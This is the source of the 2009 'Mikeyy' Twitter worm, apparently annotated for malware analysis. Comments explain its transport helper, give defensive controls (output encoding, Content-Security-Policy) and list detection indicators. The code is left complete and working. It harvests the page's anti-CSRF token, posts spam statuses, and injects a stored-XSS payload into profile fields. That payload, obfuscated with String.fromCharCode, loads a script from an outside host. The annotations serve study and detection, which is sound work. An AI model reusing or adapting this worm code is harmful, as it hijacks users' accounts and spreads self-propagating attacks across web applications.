
/**
 * Minimal cross-browser XMLHttpRequest wrapper.
 *
 * Analyst note: nothing in this helper is specific to the sample; it only
 * provides transport. Every caller in this listing passes a relative path,
 * so each request is sent to the origin of the page that is running the
 * script and is treated by the browser as a same-origin request from the
 * logged-in user.
 *
 * Intended for use with `new`. Exposes a single method, `connect`.
 */
function XHConn() {
    var xmlhttp, bComplete = false;
    // Transport selection: the two legacy IE ActiveX ProgIDs are tried first,
    // then the native XMLHttpRequest. Any failure falls through to the next one.
    try {
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e) {
        try {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        catch (e) {
            try {
                xmlhttp = new XMLHttpRequest();
            }
            catch (e) {
                // No transport available at all.
                xmlhttp = false;
            }
        }
    }
    if (!xmlhttp) {
        // NOTE(review): when invoked with `new`, a primitive/null return value
        // is ignored and the freshly created object is returned instead, so the
        // caller gets an object that has no `connect` method.
        return null;
    }
    /**
     * Issue an asynchronous request.
     *
     * @param {string} sURL    Target URL (callers in this listing pass relative paths).
     * @param {string} sMethod HTTP method; upper-cased before use.
     * @param {string} sVars   Pre-encoded `k=v&k=v` string. Appended to the URL
     *                         after "?" for GET, sent as the body otherwise.
     * @param {Function} [fnDone] Called once with the XHR object when
     *                         readyState reaches 4. May be omitted.
     * @returns {boolean} false if no transport exists or open/send threw,
     *                    true once the request has been handed to the browser.
     */
    this.connect = function (sURL, sMethod, sVars, fnDone) {
        if (!xmlhttp) {
            return false;
        }
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET") {
                xmlhttp.open(sMethod, sURL + "?" + sVars, true);
                sVars = "";
            } else {
                xmlhttp.open(sMethod, sURL, true);
                // Sets a request header literally named "Method"; this is not a
                // standard HTTP header, so it is a recognisable artifact of this
                // helper in captured traffic.
                xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
                // Form encoding, i.e. the same body format a real HTML form
                // submission would produce.
                xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            }
            xmlhttp.onreadystatechange = function () {
                // bComplete guards against the callback firing more than once
                // for the same request.
                if (xmlhttp.readyState == 4 && !bComplete) {
                    bComplete = true;
                    if (fnDone != null) {
                        fnDone(xmlhttp);
                    }
                }
            };
            xmlhttp.send(sVars);
        }
        catch (z) {
            // Any exception from open/setRequestHeader/send is swallowed and
            // reported only through the boolean return value.
            return false;
        }
        return true;
    };
    return this;
}

/**
 * Percent-encode a value for use in a form-urlencoded request body.
 *
 * Runs encodeURIComponent and then additionally escapes the characters that
 * encodeURIComponent leaves untouched (' ( ) * ~ !) and rewrites "%20" to "+".
 *
 * Analyst note: this is what lets the markup payload built elsewhere in this
 * listing travel intact inside a POST parameter; the server decodes it back to
 * the original characters, so any filtering has to happen on the decoded value.
 *
 * @param {*} str Value to encode; converted with toString() first.
 * @returns {string} Encoded string.
 */
function urlencode( str ) {
    // `tmp_arr` declared here is never used; the inner function declares its own.
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    // Literal (non-regex) global replace implemented as split + join.
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };

    // Post-processing table applied to the encodeURIComponent output.
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    // NOTE(review): `search` and `replace` are assigned without var, so in
    // sloppy mode they become properties of the global object.
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }

    // Upper-cases the two characters after each "%". encodeURIComponent and
    // the table above already emit upper-case hex, so this pass looks like a
    // no-op for the output produced here.
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });

    // Unreachable: the statement above always returns.
    return ret;
}

/**
 * Payload routine of the sample (annotated for analysis; code left as captured).
 *
 * Sequence visible in the code:
 *   1. Read the rendered page and pull the form authenticity (anti-CSRF)
 *      token out of inline script text.
 *   2. Pick one of seven canned status messages.
 *   3. Build a markup string and form-encode it.
 *   4. Fire six same-origin POSTs that post the status and overwrite profile
 *      fields, each carrying the harvested token.
 *
 * Defensive reading:
 *   - The token offers no protection here because the script already executes
 *     inside the page's origin and can read it from the DOM. An anti-CSRF
 *     token stops cross-site forgery, not script injected into the site.
 *   - Persistence depends on the stored user[name] value later being rendered
 *     without HTML escaping (inferred from the payload shape; the rendering
 *     code is not part of this listing). Output encoding at render time and a
 *     Content-Security-Policy that restricts script sources are the controls
 *     that break this chain.
 *   - Detection candidates: a burst of POSTs to /status/update,
 *     /account/settings and /account/profile_settings from one session within
 *     the same second; a user[name] value containing "String.fromCharCode(" or
 *     "<script"; a request header named "Method" (set by the XHConn helper).
 */
function wait()
{
  // Whole-document HTML as a string, used only to search for the token.
  var content = document.documentElement.innerHTML;

  // NOTE(review): `authreg` is assigned without var (implicit global in
  // sloppy mode). If the pattern is absent from the page, exec() returns null
  // and the index on the next line throws, so nothing below runs.
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];

  // Canned status texts; one is chosen at random per execution. Several embed
  // shortened links. These strings are stable indicators for content search.
  var randomUpdate=new Array();
  randomUpdate[0]="Twitter, freaking fix this already. >:[ - Mikeyy";
  randomUpdate[1]="Twitter, your community is going to be mad at you... - Mikeyy";
  randomUpdate[2]="This worm is getting out of hand Twitter. - Mikeyy";
  randomUpdate[3]="RT!! 4th gen #Mikeyy worm on the loose! Click here to protect yourself: http://tinyurl.com/cojc6s";
  randomUpdate[4]="This is all Twitters fault! Don't blame Mikeyy!!";
  randomUpdate[5]="ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT: http://bit.ly/4ywBID";
  randomUpdate[6]="How TO remove new Mikeyy worm! RT!!  http://bit.ly/yCL1s";

  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  var updateEncode = urlencode(genRand);

  // Single-entry table, so the "random" pick below always yields entry 0.
  // The value starts with `">` (closes an attribute value and its tag) and
  // uses document.write(String.fromCharCode(...)) so that the script URL does
  // not appear as plain text. The char codes decode to a <script src=...> tag
  // pointing at hxxp://www[.]stalkdaily[.]com/ajax.js (defanged).
  var randomXSS=new Array();
  randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>';
  var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];

  var xss = urlencode(genXSS);

  // All six requests are fire-and-forget: no completion callback is passed
  // and the boolean result of connect() is ignored.

  // 1) Post the chosen status text.
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
  // 2) Store the markup string in the display-name field; user[protected]=0
  //    presumably turns off the protected-account setting (server semantics
  //    not shown here).
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
  // 3) Overwrite profile colour and URL fields with marker text.
  var ajaxConn2 = new XHConn();
  ajaxConn2.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&commit=save changes");
  // 4) Same as (2) with the URL field added.
  var ajaxConn3 = new XHConn();
  ajaxConn3.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected]=0&commit=Save");
  // 5) Same as (3) but carrying user[name] instead of user[url].
  var ajaxConn4 = new XHConn();
  ajaxConn4.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[name]="+xss+"&commit=save changes");
  // 6) Byte-for-byte repeat of request (2).
  var ajaxConn5 = new XHConn();
  ajaxConn5.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
}

// Entry point: schedules wait() once, 3550 ms after this script is evaluated.
// The string form of setTimeout is evaluated as code in global scope, so a
// Content-Security-Policy without 'unsafe-eval' would block this call.
// The delay presumably gives the host page time to finish rendering so the
// token text is present in the DOM (intent inferred, not stated in the sample).
setTimeout("wait()",3550);